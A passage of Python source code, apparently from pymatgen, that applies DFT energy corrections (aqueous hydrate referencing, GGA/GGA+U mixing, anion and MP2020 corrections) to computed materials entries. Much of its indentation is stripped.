# if the composition contains water molecules (e.g. FeO.nH2O),
# correct the gibbs free energy such that the waters are assigned energy=MU_H2O
# in other words, we assume that the DFT energy of such a compound is really
# a superposition of the "real" solid DFT energy (FeO in this case) and the free
# energy of some water molecules
# e.g. that E_FeO.nH2O = E_FeO + n * g_H2O
# so, to get the most accurate gibbs free energy, we want to replace
# g_FeO.nH2O = E_FeO.nH2O + dE_Fe + (n+1) * dE_O + 2n dE_H
# with
# g_FeO = E_FeO.nH2O + dE_Fe + dE_O + n g_H2O
# where E is DFT energy, dE is an energy correction, and g is gibbs free energy
# This means we have to 1) remove energy corrections associated with H and O in water
# and then 2) remove the free energy of the water molecules
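            # Worked example (illustrative): for FeO.4H2O the composition has
            # comp["H"] = 8 and comp["O"] = 5, so nH2O = min(8/2, 5) = 4 whole
            # water molecules are treated as embedded H2O below.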
nH2O = int(min(comp["H"] / 2.0, comp["O"])) # only count whole water molecules
if nH2O > 0:
# first, remove any H or O corrections already applied to H2O in the
# formation energy so that we don't double count them
# No. of H atoms not in a water
correction -= ufloat((comp["H"] - nH2O / 2) * self.comp_correction["H"], 0.0)
# No. of O atoms not in a water
correction -= ufloat(
(comp["O"] - nH2O) * (self.comp_correction["oxide"] + self.oxide_correction["oxide"]),
0.0,
)
# next, add MU_H2O for each water molecule present
correction += ufloat(-1 * MU_H2O * nH2O, 0.0)
# correction += 0.5 * 2.46 * nH2O # this is the old way this correction was calculated
return correction
def __str__(self):
return f"{self.name} Aqueous Correction"
@cached_class
class UCorrection(Correction):
"""
This class implements the GGA/GGA+U mixing scheme, which allows mixing of
entries. Entry.parameters must contain a "hubbards" key which is a dict
of all non-zero Hubbard U values used in the calculation. For example,
if you ran a Fe2O3 calculation with Materials Project parameters,
this would look like entry.parameters["hubbards"] = {"Fe": 5.3}
If the "hubbards" key is missing, a GGA run is assumed.
It should be noted that ComputedEntries assimilated using the
pymatgen.apps.borg package and obtained via the MaterialsProject REST
interface using the pymatgen.matproj.rest package will automatically have
these fields populated.
"""
common_peroxides = [
"Li2O2",
"Na2O2",
"K2O2",
"Cs2O2",
"Rb2O2",
"BeO2",
"MgO2",
"CaO2",
"SrO2",
"BaO2",
]
common_superoxides = ["LiO2", "NaO2", "KO2", "RbO2", "CsO2"]
ozonides = ["LiO3", "NaO3", "KO3", "NaO5"]
def __init__(self, config_file, input_set, compat_type, error_file=None):
"""
Args:
config_file: Path to the selected compatibility.yaml config file.
input_set: InputSet object (to check for the +U settings)
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means mixing scheme is
implemented to make entries compatible with each other,
but entries which are supposed to be done in GGA+U will have the
equivalent GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. A GGA Fe oxide run
will therefore be excluded under the scheme.
error_file: Path to the selected compatibilityErrors.yaml config file.
"""
if compat_type not in ["GGA", "Advanced"]:
raise CompatibilityError(f"Invalid compat_type {compat_type}")
c = loadfn(config_file)
self.input_set = input_set
if compat_type == "Advanced":
self.u_settings = self.input_set.CONFIG["INCAR"]["LDAUU"]
self.u_corrections = c["Advanced"]["UCorrections"]
else:
self.u_settings = {}
self.u_corrections = {}
self.name = c["Name"]
self.compat_type = compat_type
if error_file:
e = loadfn(error_file)
self.u_errors = e["Advanced"]["UCorrections"]
else:
self.u_errors = {}
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction, Uncertainty.
"""
if entry.parameters.get("run_type") not in ["GGA", "GGA+U"]:
raise CompatibilityError(
f"Entry {entry.entry_id} has invalid run type {entry.parameters.get('run_type')}. Discarding."
)
calc_u = entry.parameters.get("hubbards", None)
calc_u = defaultdict(int) if calc_u is None else calc_u
comp = entry.composition
elements = sorted((el for el in comp.elements if comp[el] > 0), key=lambda el: el.X)
most_electroneg = elements[-1].symbol
correction = ufloat(0.0, 0.0)
# only correct GGA or GGA+U entries
if entry.parameters.get("run_type", None) not in ["GGA", "GGA+U"]:
return ufloat(0.0, 0.0)
ucorr = self.u_corrections.get(most_electroneg, {})
usettings = self.u_settings.get(most_electroneg, {})
uerrors = self.u_errors.get(most_electroneg, defaultdict(float))
for el in comp.elements:
sym = el.symbol
# Check for bad U values
if calc_u.get(sym, 0) != usettings.get(sym, 0):
raise CompatibilityError(f"Invalid U value of {calc_u.get(sym, 0)} on {sym}")
if sym in ucorr:
correction += ufloat(ucorr[sym], uerrors[sym]) * comp[el]
return correction
def __str__(self):
return f"{self.name} {self.compat_type} Correction"
class Compatibility(MSONable, metaclass=abc.ABCMeta):
"""
Abstract Compatibility class, not intended for direct use.
Compatibility classes are used to correct the energies of an entry or a set
of entries. All Compatibility classes must implement .get_adjustments method.
"""
@abc.abstractmethod
def get_adjustments(self, entry: AnyCompEntry) -> List[EnergyAdjustment]:
"""
Get the energy adjustments for a ComputedEntry.
This method must generate a list of EnergyAdjustment objects
of the appropriate type (constant, composition-based, or temperature-based)
to be applied to the ComputedEntry, and must raise a CompatibilityError
if the entry is not compatible.
Args:
entry: A ComputedEntry object.
Returns:
[EnergyAdjustment]: A list of EnergyAdjustment to be applied to the
Entry.
Raises:
CompatibilityError if the entry is not compatible
"""
def process_entry(self, entry: ComputedEntry) -> Optional[ComputedEntry]:
"""
Process a single entry with the chosen Corrections. Note
that this method will change the data of the original entry.
Args:
entry: A ComputedEntry object.
Returns:
An adjusted entry if entry is compatible, otherwise None is
returned.
"""
try:
return self.process_entries(entry)[0]
except IndexError:
return None
def process_entries(
self, entries: Union[AnyCompEntry, List[AnyCompEntry]], clean: bool = True, verbose: bool = False
) -> List[ComputedEntry]:
"""
Process a sequence of entries with the chosen Compatibility scheme. Note
that this method will change the data of the original entries.
Args:
entries: ComputedEntry or [ComputedEntry]
clean: bool, whether to remove any previously-applied energy adjustments.
If True, all EnergyAdjustment are removed prior to processing the Entry.
Default is True.
verbose: bool, whether to display progress bar for processing multiple entries.
Default is False.
Returns:
A list of adjusted entries. Entries in the original list which
are not compatible are excluded.
"""
# convert input arg to a list if not already
if isinstance(entries, ComputedEntry):
entries = [entries]
processed_entry_list = []
for entry in tqdm(entries, disable=(not verbose)):
ignore_entry = False
# if clean is True, remove all previous adjustments from the entry
if clean:
entry.energy_adjustments = []
# get the energy adjustments
try:
adjustments = self.get_adjustments(entry)
except CompatibilityError:
ignore_entry = True
continue
for ea in adjustments:
# Has this correction already been applied?
if (ea.name, ea.cls, ea.value) in [(ea.name, ea.cls, ea.value) for ea in entry.energy_adjustments]:
# we already applied this exact correction. Do nothing.
pass
elif (ea.name, ea.cls) in [(ea.name, ea.cls) for ea in entry.energy_adjustments]:
# we already applied a correction with the same name
# but a different value. Something is wrong.
ignore_entry = True
warnings.warn(
"Entry {} already has an energy adjustment called {}, but its "
"value differs from the value of {:.3f} calculated here. This "
"Entry will be discarded.".format(entry.entry_id, ea.name, ea.value)
)
else:
# Add the correction to the energy_adjustments list
entry.energy_adjustments.append(ea)
if not ignore_entry:
processed_entry_list.append(entry)
return processed_entry_list
@staticmethod
def explain(entry):
"""
Prints an explanation of the energy adjustments applied by the
Compatibility class. Inspired by the "explain" methods in many database
methodologies.
Args:
entry: A ComputedEntry.
"""
print(
"The uncorrected energy of {} is {:.3f} eV ({:.3f} eV/atom).".format(
entry.composition,
entry.uncorrected_energy,
entry.uncorrected_energy / entry.composition.num_atoms,
)
)
if len(entry.energy_adjustments) > 0:
print("The following energy adjustments have been applied to this entry:")
for e in entry.energy_adjustments:
print(f"\t\t{e.name}: {e.value:.3f} eV ({e.value / entry.composition.num_atoms:.3f} eV/atom)")
elif entry.correction == 0:
print("No energy adjustments have been applied to this entry.")
print(
"The final energy after adjustments is {:.3f} eV ({:.3f} eV/atom).".format(
entry.energy, entry.energy_per_atom
)
)
class CorrectionsList(Compatibility):
"""
The CorrectionsList class combines a list of corrections to be applied to
an entry or a set of entries. Note that some of the Corrections have
interdependencies. For example, PotcarCorrection must always be used
before any other compatibility. Also, AnionCorrection("MP") must be used
with PotcarCorrection("MP") (similarly with "MIT"). Typically,
you should use the specific MaterialsProjectCompatibility and
MITCompatibility subclasses instead.
"""
def __init__(self, corrections: Sequence):
"""
Args:
corrections: List of corrections to apply.
"""
self.corrections = corrections
super().__init__()
def get_adjustments(self, entry):
"""
Get the list of energy adjustments to be applied to an entry.
"""
adjustment_list = []
corrections, uncertainties = self.get_corrections_dict(entry)
for k, v in corrections.items():
if v != 0 and uncertainties[k] == 0:
uncertainty = np.nan
else:
uncertainty = uncertainties[k]
adjustment_list.append(
ConstantEnergyAdjustment(
v,
uncertainty=uncertainty,
name=k,
cls=self.as_dict(),
)
)
return adjustment_list
def get_corrections_dict(self, entry):
"""
Returns the corrections applied to a particular entry.
Args:
entry: A ComputedEntry object.
Returns:
({correction_name: value})
"""
corrections = {}
uncertainties = {}
for c in self.corrections:
val = c.get_correction(entry)
if val != 0:
corrections[str(c)] = val.nominal_value
uncertainties[str(c)] = val.std_dev
return corrections, uncertainties
def get_explanation_dict(self, entry):
"""
Provides an explanation dict of the corrections that are being applied
for a given compatibility scheme. Inspired by the "explain" methods
in many database methodologies.
Args:
entry: A ComputedEntry.
Returns:
(dict) of the form
{"Compatibility": "string",
"Uncorrected_energy": float,
"Corrected_energy": float,
"correction_uncertainty:" float,
"Corrections": [{"Name of Correction": {
"Value": float, "Explanation": "string", "Uncertainty": float}]}
"""
centry = self.process_entry(entry)
if centry is None:
uncorrected_energy = entry.uncorrected_energy
corrected_energy = None
correction_uncertainty = None
else:
uncorrected_energy = centry.uncorrected_energy
corrected_energy = centry.energy
correction_uncertainty = centry.correction_uncertainty
d = {
"compatibility": self.__class__.__name__,
"uncorrected_energy": uncorrected_energy,
"corrected_energy": corrected_energy,
"correction_uncertainty": correction_uncertainty,
}
corrections = []
corr_dict, uncer_dict = self.get_corrections_dict(entry)
for c in self.corrections:
if corr_dict.get(str(c), 0) != 0 and uncer_dict.get(str(c), 0) == 0:
uncer = np.nan
else:
uncer = uncer_dict.get(str(c), 0)
cd = {
"name": str(c),
"description": c.__doc__.split("Args")[0].strip(),
"value": corr_dict.get(str(c), 0),
"uncertainty": uncer,
}
corrections.append(cd)
d["corrections"] = corrections
return d
def explain(self, entry):
"""
Prints an explanation of the corrections that are being applied for a
given compatibility scheme. Inspired by the "explain" methods in many
database methodologies.
Args:
entry: A ComputedEntry.
"""
d = self.get_explanation_dict(entry)
print(f"The uncorrected value of the energy of {entry.composition} is {d['uncorrected_energy']:f} eV")
print(f"The following corrections / screening are applied for {d['compatibility']}:\n")
for c in d["corrections"]:
print(f"{c['name']} correction: {c['description']}\n")
print(f"For the entry, this correction has the value {c['value']:f} eV.")
if c["uncertainty"] != 0 or c["value"] == 0:
print(f"This correction has an uncertainty value of {c['uncertainty']:f} eV.")
else:
print("This correction does not have uncertainty data available")
print("-" * 30)
print(f"The final energy after corrections is {d['corrected_energy']:f}")
class MaterialsProjectCompatibility(CorrectionsList):
"""
This class implements the GGA/GGA+U mixing scheme, which allows mixing of
entries. Note that this should only be used for VASP calculations using the
MaterialsProject parameters (see pymatgen.io.vaspio_set.MPVaspInputSet).
Using this compatibility scheme on runs with different parameters is not
valid.
"""
def __init__(self, compat_type="Advanced", correct_peroxide=True, check_potcar_hash=False):
"""
Args:
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means mixing scheme is
implemented to make entries compatible with each other,
but entries which are supposed to be done in GGA+U will have the
equivalent GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. A GGA Fe oxide run
will therefore be excluded under the scheme.
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not.
check_potcar_hash (bool): Use potcar hash to verify potcars are correct.
"""
self.compat_type = compat_type
self.correct_peroxide = correct_peroxide
self.check_potcar_hash = check_potcar_hash
fp = os.path.join(MODULE_DIR, "MPCompatibility.yaml")
super().__init__(
[
PotcarCorrection(MPRelaxSet, check_hash=check_potcar_hash),
GasCorrection(fp),
AnionCorrection(fp, correct_peroxide=correct_peroxide),
UCorrection(fp, MPRelaxSet, compat_type),
]
)
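# Illustrative usage sketch (the entry list is hypothetical; it assumes the
# entries were produced with Materials Project input settings and carry the
# usual "potcar_symbols"/"hubbards" parameters):
#   compat = MaterialsProjectCompatibility(compat_type="Advanced")
#   processed_entries = compat.process_entries(entries)
#   compat.explain(processed_entries[0])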
@cached_class
class MaterialsProject2020Compatibility(Compatibility):
"""
This class implements the Materials Project 2020 energy correction scheme,
which incorporates uncertainty quantification and allows for mixing of GGA
and GGA+U entries (see References).
Note that this scheme should only be applied to VASP calculations that use the
Materials Project input set parameters (see pymatgen.io.vasp.sets.MPRelaxSet).
Using this compatibility scheme on calculations with different parameters is not
valid.
"""
def __init__(
self,
compat_type="Advanced",
correct_peroxide=True,
check_potcar_hash=False,
config_file=None,
):
"""
Args:
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means the GGA/GGA+U mixing scheme
of Jain et al. (see References) is implemented. In this case,
entries which are supposed to be calculated in GGA+U (i.e.,
transition metal oxides and fluorides) will have the corresponding
GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. An Fe oxide run in GGA
will therefore be excluded.
To use the "Advanced" type, Entry.parameters must contain a "hubbards"
key which is a dict of all non-zero Hubbard U values used in the
calculation. For example, if you ran a Fe2O3 calculation with
Materials Project parameters, this would look like
entry.parameters["hubbards"] = {"Fe": 5.3}. If the "hubbards" key
is missing, a GGA run is assumed. Entries obtained from the
MaterialsProject database will automatically have these fields
populated.
(Default: "Advanced")
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not. If false, all oxygen-containing
compounds are assigned the 'oxide' correction. (Default: True)
check_potcar_hash (bool): Use potcar hash to verify POTCAR settings are
consistent with MPRelaxSet. If False, only the POTCAR symbols will
be used. (Default: False)
config_file (Path): Path to the selected compatibility.yaml config file.
If None, defaults to `MP2020Compatibility.yaml` distributed with
pymatgen.
References:
Wang, A., Kingsbury, R., McDermott, M., Horton, M., Jain. A., Ong, S.P.,
Dwaraknath, S., Persson, K. A framework for quantifying uncertainty
in DFT energy corrections. Scientific Reports 11: 15496, 2021.
https://doi.org/10.1038/s41598-021-94550-5
Jain, A. et al. Formation enthalpies by mixing GGA and GGA + U calculations.
Phys. Rev. B - Condens. Matter Mater. Phys. 84, 1–10 (2011).
"""
if compat_type not in ["GGA", "Advanced"]:
raise CompatibilityError(f"Invalid compat_type {compat_type}")
self.compat_type = compat_type
self.correct_peroxide = correct_peroxide
self.check_potcar_hash = check_potcar_hash
# load corrections and uncertainties
if config_file:
if os.path.isfile(config_file):
self.config_file = config_file
c = loadfn(self.config_file)
else:
raise ValueError(
f"Custom MaterialsProject2020Compatibility config_file ({config_file}) does not exist."
)
else:
self.config_file = None
c = loadfn(os.path.join(MODULE_DIR, "MP2020Compatibility.yaml"))
self.name = c["Name"]
self.comp_correction = c["Corrections"].get("CompositionCorrections", defaultdict(float))
self.comp_errors = c["Uncertainties"].get("CompositionCorrections", defaultdict(float))
if self.compat_type == "Advanced":
self.u_settings = MPRelaxSet.CONFIG["INCAR"]["LDAUU"]
self.u_corrections = c["Corrections"].get("GGAUMixingCorrections", defaultdict(float))
self.u_errors = c["Uncertainties"].get("GGAUMixingCorrections", defaultdict(float))
else:
self.u_settings = {}
self.u_corrections = {}
self.u_errors = {}
def get_adjustments(self, entry: AnyCompEntry):
"""
Get the energy adjustments for a ComputedEntry or ComputedStructureEntry.
Energy corrections are implemented directly in this method instead of in
separate AnionCorrection, GasCorrection, or UCorrection classes which
were used in the legacy correction scheme.
Args:
entry: A ComputedEntry or ComputedStructureEntry object.
Returns:
[EnergyAdjustment]: A list of EnergyAdjustment to be applied to the
Entry.
Raises:
CompatibilityError if the entry is not compatible
"""
if entry.parameters.get("run_type") not in ["GGA", "GGA+U"]:
raise CompatibilityError(
"Entry {} has invalid run type {}. Must be GGA or GGA+U. Discarding.".format(
entry.entry_id, entry.parameters.get("run_type")
)
)
# check the POTCAR symbols
# this should return ufloat(0, 0) or raise a CompatibilityError or ValueError
pc = PotcarCorrection(MPRelaxSet, check_hash=self.check_potcar_hash)
pc.get_correction(entry)
# apply energy adjustments
adjustments: List[CompositionEnergyAdjustment] = []
comp = entry.composition
rform = comp.reduced_formula
# sorted list of elements, ordered by electronegativity
elements = sorted((el for el in comp.elements if comp[el] > 0), key=lambda el: el.X)
# Skip single elements
if len(comp) == 1:
return adjustments
# Check for sulfide corrections
if Element("S") in comp:
sf_type = "sulfide"
if entry.data.get("sulfide_type"):
sf_type = entry.data["sulfide_type"]
elif hasattr(entry, "structure"):
sf_type = sulfide_type(entry.structure)
# use the same correction for polysulfides and sulfides
if sf_type == "polysulfide":
sf_type = "sulfide"
if sf_type == "sulfide":
adjustments.append(
CompositionEnergyAdjustment(
self.comp_correction["S"],
comp["S"],
uncertainty_per_atom=self.comp_errors["S"],
name="MP2020 anion correction (S)",
cls=self.as_dict(),
)
)
# Check for oxide, peroxide, superoxide, and ozonide corrections.
if Element("O") in comp:
if self.correct_peroxide:
# determine the oxide_type
if entry.data.get("oxide_type"):
ox_type = entry.data["oxide_type"]
elif hasattr(entry, "structure"):
ox_type, nbonds = oxide_type(entry.structure, 1.05, return_nbonds=True)
else:
warnings.warn(
"No structure or oxide_type parameter present. Note "
"that peroxide/superoxide corrections are not as "
"reliable and relies only on detection of special"
"formulas, e.g., Li2O2."
)
common_peroxides = [
"Li2O2",
"Na2O2",
"K2O2",
"Cs2O2",
"Rb2O2",
"BeO2",
"MgO2",
"CaO2",
"SrO2",
"BaO2",
]
common_superoxides = ["LiO2", "NaO2", "KO2", "RbO2", "CsO2"]
ozonides = ["LiO3", "NaO3", "KO3", "NaO5"]
if rform in common_peroxides:
ox_type = "peroxide"
elif rform in common_superoxides:
ox_type = "superoxide"
elif rform in ozonides:
ox_type = "ozonide"
else:
ox_type = "oxide"
else:
ox_type = "oxide"
if ox_type == "hydroxide":
ox_type = "oxide"
adjustments.append(
CompositionEnergyAdjustment(
self.comp_correction[ox_type],
comp["O"],
uncertainty_per_atom=self.comp_errors[ox_type],
name=f"MP2020 anion correction ({ox_type})",
cls=self.as_dict(),
)
)
# Check for anion corrections
# only apply anion corrections if the element is an anion
# first check for a pre-populated oxidation states key
# the key is expected to comprise a dict corresponding to the first element output by
# Composition.oxi_state_guesses(), e.g. {'Al': 3.0, 'S': 2.0, 'O': -2.0} for 'Al2SO4'
if "oxidation_states" not in entry.data.keys():
# try to guess the oxidation states from composition
# for performance reasons, fail if the composition is too large
try:
oxi_states = entry.composition.oxi_state_guesses(max_sites=-20)
except ValueError:
oxi_states = []
if oxi_states == []:
entry.data["oxidation_states"] = {}
else:
entry.data["oxidation_states"] = oxi_states[0]
if entry.data["oxidation_states"] == {}:
warnings.warn(
f"Failed to guess oxidation states for Entry {entry.entry_id} "
f"({entry.composition.reduced_formula}). Assigning anion correction to "
"only the most electronegative atom."
)
for anion in ["Br", "I", "Se", "Si", "Sb", "Te", "H", "N", "F", "Cl"]:
if Element(anion) in comp and anion in self.comp_correction:
apply_correction = False
# if the oxidation_states key is not populated, only apply the correction if the anion
# is the most electronegative element
if entry.data["oxidation_states"].get(anion, 0) < 0:
apply_correction = True
else:
most_electroneg = elements[-1].symbol
if anion == most_electroneg:
apply_correction = True
if apply_correction:
adjustments.append(
CompositionEnergyAdjustment(
self.comp_correction[anion],
comp[anion],
uncertainty_per_atom=self.comp_errors[anion],
name=f"MP2020 anion correction ({anion})",
cls=self.as_dict(),
)
)
# GGA / GGA+U mixing scheme corrections
calc_u = entry.parameters.get("hubbards", None)
calc_u = defaultdict(int) if calc_u is None else calc_u
most_electroneg = elements[-1].symbol
ucorr = self.u_corrections.get(most_electroneg, defaultdict(float))
usettings = self.u_settings.get(most_electroneg, defaultdict(float))
uerrors = self.u_errors.get(most_electroneg, defaultdict(float))
for el in comp.elements:
sym = el.symbol
# Check for bad U values
if calc_u.get(sym, 0) != usettings.get(sym, 0):
raise CompatibilityError(f"Invalid U value of {calc_u.get(sym, 0):.1f} on {sym}")
if sym in ucorr:
adjustments.append(
CompositionEnergyAdjustment(
ucorr[sym],
comp[el],
uncertainty_per_atom=uerrors[sym],
name=f"MP2020 GGA/GGA+U mixing correction ({sym})",
cls=self.as_dict(),
)
)
return adjustments
class MITCompatibility(CorrectionsList):
"""
This class implements the GGA/GGA+U mixing scheme, which allows mixing of
entries. Note that this should only be used for VASP calculations using the
MIT parameters (see pymatgen.io.vaspio_set MITVaspInputSet). Using
this compatibility scheme on runs with different parameters is not valid.
"""
def __init__(self, compat_type="Advanced", correct_peroxide=True, check_potcar_hash=False):
"""
Args:
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means mixing scheme is
implemented to make entries compatible with each other,
but entries which are supposed to be done in GGA+U will have the
equivalent GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. A GGA Fe oxide run
will therefore be excluded under the scheme.
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not.
check_potcar_hash (bool): Use potcar hash to verify potcars are correct.
"""
self.compat_type = compat_type
self.correct_peroxide = correct_peroxide
self.check_potcar_hash = check_potcar_hash
fp = os.path.join(MODULE_DIR, "MITCompatibility.yaml")
super().__init__(
[
PotcarCorrection(MITRelaxSet, check_hash=check_potcar_hash),
GasCorrection(fp),
AnionCorrection(fp, correct_peroxide=correct_peroxide),
UCorrection(fp, MITRelaxSet, compat_type),
]
)
class MITAqueousCompatibility(CorrectionsList):
"""
This class implements the GGA/GGA+U mixing scheme, which allows mixing of
entries. Note that this should only be used for VASP calculations using the
MIT parameters (see pymatgen.io.vaspio_set MITVaspInputSet). Using
this compatibility scheme on runs with different parameters is not valid.
"""
def __init__(self, compat_type="Advanced", correct_peroxide=True, check_potcar_hash=False):
"""
Args:
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means mixing scheme is
implemented to make entries compatible with each other,
but entries which are supposed to be done in GGA+U will have the
equivalent GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. A GGA Fe oxide run
will therefore be excluded under the scheme.
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not.
check_potcar_hash (bool): Use potcar hash to verify potcars are correct.
"""
self.compat_type = compat_type
self.correct_peroxide = correct_peroxide
self.check_potcar_hash = check_potcar_hash
fp = os.path.join(MODULE_DIR, "MITCompatibility.yaml")
super().__init__(
[
PotcarCorrection(MITRelaxSet, check_hash=check_potcar_hash),
GasCorrection(fp),
AnionCorrection(fp, correct_peroxide=correct_peroxide),
UCorrection(fp, MITRelaxSet, compat_type),
AqueousCorrection(fp),
]
)
@cached_class
class MaterialsProjectAqueousCompatibility(Compatibility):
"""
This class implements the Aqueous energy referencing scheme for constructing
Pourbaix diagrams from DFT energies, as described in Persson et al.
This scheme applies various energy adjustments to convert DFT energies into
Gibbs free energies of formation at 298 K and to guarantee that the experimental
formation free energy of H2O is reproduced. Briefly, the steps are:
1. Beginning with the DFT energy of O2, adjust the energy of H2 so that
the experimental reaction energy of -2.458 eV/H2O is reproduced.
2. Add entropy to the DFT energy of any compounds that are liquid or
gaseous at room temperature
3. Adjust the DFT energies of solid hydrate compounds (compounds that
contain water, e.g. FeO.nH2O) such that the energies of the embedded
H2O molecules are equal to the experimental free energy
The above energy adjustments are computed dynamically based on the input
Entries.
References:
K.A. Persson, B. Waldwick, P. Lazic, G. Ceder, Prediction of solid-aqueous
equilibria: Scheme to combine first-principles calculations of solids with
experimental aqueous states, Phys. Rev. B - Condens. Matter Mater. Phys.
85 (2012) 1–12. doi:10.1103/PhysRevB.85.235438.
"""
def __init__(
self,
solid_compat: Optional[Union[Compatibility, Type[Compatibility]]] = MaterialsProject2020Compatibility,
o2_energy: Optional[float] = None,
h2o_energy: Optional[float] = None,
h2o_adjustments: Optional[float] = None,
):
"""
Initialize the MaterialsProjectAqueousCompatibility class.
Note that this class requires as inputs the ground-state DFT energies of O2 and H2O, plus the value of any
energy adjustments applied to an H2O molecule. If these parameters are not provided in __init__, they can
be automatically populated by including ComputedEntry for the ground state of O2 and H2O in a list of
entries passed to process_entries. process_entries will fail if one or the other is not provided.
Args:
solid_compat: Compatibility scheme used to pre-process solid DFT energies prior to applying aqueous
energy adjustments. May be passed as a class (e.g. MaterialsProject2020Compatibility) or an instance
(e.g., MaterialsProject2020Compatibility()). If None, solid DFT energies are used as-is.
Default: MaterialsProject2020Compatibility
o2_energy: The ground-state DFT energy of oxygen gas, including any adjustments or corrections, in eV/atom.
If not set, this value will be determined from any O2 entries passed to process_entries.
Default: None
            h2o_energy: The ground-state DFT energy of water, including any adjustments or corrections, in eV/atom.
If not set, this value will be determined from any H2O entries passed to process_entries.
Default: None
h2o_adjustments: Total energy adjustments applied to one water molecule, in eV/atom.
If not set, this value will be determined from any H2O entries passed to process_entries.
Default: None
"""
self.solid_compat = None
# check whether solid_compat has been instantiated
if solid_compat is None:
self.solid_compat = None
elif isinstance(solid_compat, type) and issubclass(solid_compat, Compatibility):
self.solid_compat = solid_compat()
elif issubclass(type(solid_compat), Compatibility):
self.solid_compat = solid_compat
else:
raise ValueError("Expected a Compatibility class, instance of a Compatibility or None")
self.o2_energy = o2_energy
self.h2o_energy = h2o_energy
self.h2_energy = None
self.h2o_adjustments = h2o_adjustments
if not all([self.o2_energy, self.h2o_energy, self.h2o_adjustments]):
warnings.warn(
"You did not provide the required O2 and H2O energies. {} "
"needs these energies in order to compute the appropriate energy adjustments. It will try "
"to determine the values from ComputedEntry for O2 and H2O passed to process_entries, but "
"will fail if these entries are not provided.".format(type(self).__name__)
)
# Standard state entropy of molecular-like compounds at 298K (-T delta S)
# from Kubaschewski Tables (eV/atom)
self.cpd_entropies = {
"O2": 0.316731,
"N2": 0.295729,
"F2": 0.313025,
"Cl2": 0.344373,
"Br": 0.235039,
"Hg": 0.234421,
"H2O": 0.071963, # 0.215891 eV/H2O
}
self.name = "MP Aqueous free energy adjustment"
super().__init__()
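    # Illustrative usage sketch (hypothetical entry list): the O2 and H2O
    # reference energies can either be discovered from the entries themselves,
    #   aq_compat = MaterialsProjectAqueousCompatibility()
    #   processed = aq_compat.process_entries(all_entries)  # list must include O2 and H2O entries
    # or be supplied explicitly (the numbers below are placeholders, not
    # recommended values):
    #   aq_compat = MaterialsProjectAqueousCompatibility(
    #       o2_energy=-4.95, h2o_energy=-5.20, h2o_adjustments=-0.23)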
def get_adjustments(self, entry):
"""
Returns the corrections applied to a particular entry.
Args:
entry: A ComputedEntry object.
Returns:
[EnergyAdjustment]: Energy adjustments to be applied to entry.
Raises:
CompatibilityError if the required O2 and H2O energies have not been provided to
MaterialsProjectAqueousCompatibility during init or in the list of entries passed to process_entries.
"""
adjustments = []
if self.o2_energy is None or self.h2o_energy is None or self.h2o_adjustments is None:
raise CompatibilityError(
"You did not provide the required O2 and H2O energies. "
"{} needs these energies in order to compute "
"the appropriate energy adjustments. Either specify the energies as arguments "
"to {}.__init__ or run process_entries on a list that includes ComputedEntry for "
"the ground state of O2 and H2O.".format(type(self).__name__, type(self).__name__)
)
# compute the free energies of H2 and H2O (eV/atom) to guarantee that the
        # formation free energy of H2O is equal to -2.4583 eV/H2O from experiments
# (MU_H2O from Pourbaix module)
# Free energy of H2 in eV/atom, fitted using Eq. 40 of Persson et al. PRB 2012 85(23)
# for this calculation ONLY, we need the (corrected) DFT energy of water
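        # i.e. g(H2) is chosen so that g(H2O) - g(H2) - 0.5 * g(O2) = MU_H2O per
        # H2O molecule; written per atom (all energies here are eV/atom) that
        # rearranges to the expression below with its factors of 3, 1 and 0.5.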
self.fit_h2_energy = round(
0.5
* (
3 * (self.h2o_energy - self.cpd_entropies["H2O"]) - (self.o2_energy - self.cpd_entropies["O2"]) - MU_H2O
),
6,
)
comp = entry.composition
rform = comp.reduced_formula
# use fit_h2_energy to adjust the energy of all H2 polymorphs such that
# the lowest energy polymorph has the correct experimental value
# if h2o and o2 energies have been set explicitly via kwargs, then
# all H2 polymorphs will get the same energy.
if rform == "H2":
adjustments.append(
ConstantEnergyAdjustment(
(self.fit_h2_energy - self.h2_energy) * comp.num_atoms,
uncertainty=np.nan,
name="MP Aqueous H2 / H2O referencing",
cls=self.as_dict(),
description="Adjusts the H2 energy to reproduce the experimental "
"Gibbs formation free energy of H2O, based on the DFT energy "
"of Oxygen and H2O",
)
)
# add minus T delta S to the DFT energy (enthalpy) of compounds that are
# molecular-like at room temperature
if rform in self.cpd_entropies:
adjustments.append(
TemperatureEnergyAdjustment(
-1 * self.cpd_entropies[rform] / 298,
298,
comp.num_atoms,
uncertainty_per_deg=np.nan,
name="Compound entropy at room temperature",
cls=self.as_dict(),
description="Adds the entropy (T delta S) to energies of compounds that "
"are gaseous or liquid at standard state",
)
)
# TODO - detection of embedded water molecules is not very sophisticated
# Should be replaced with some kind of actual structure detection
# For any compound except water, check to see if it is a hydrate (contains)
# H2O in its structure. If so, adjust the energy to remove MU_H2O ev per
# embedded water molecule.
# in other words, we assume that the DFT energy of such a compound is really
# a superposition of the "real" solid DFT energy (FeO in this case) and the free
# energy of some water molecules
# e.g. that E_FeO.nH2O = E_FeO + n * g_H2O
# so, to get the most accurate gibbs free energy, we want to replace
# g_FeO.nH2O = E_FeO.nH2O + dE_Fe + (n+1) * dE_O + 2n dE_H
# with
# g_FeO = E_FeO.nH2O + dE_Fe + dE_O + n g_H2O
# where E is DFT energy, dE is an energy correction, and g is gibbs free energy
# This means we have to 1) remove energy corrections associated with H and O in water
# and then 2) remove the free energy of the water molecules
if not rform == "H2O":
# count the number of whole water molecules in the composition
nH2O = int(min(comp["H"] / 2.0, comp["O"]))
if nH2O > 0:
# first, remove any H or O corrections already applied to H2O in the
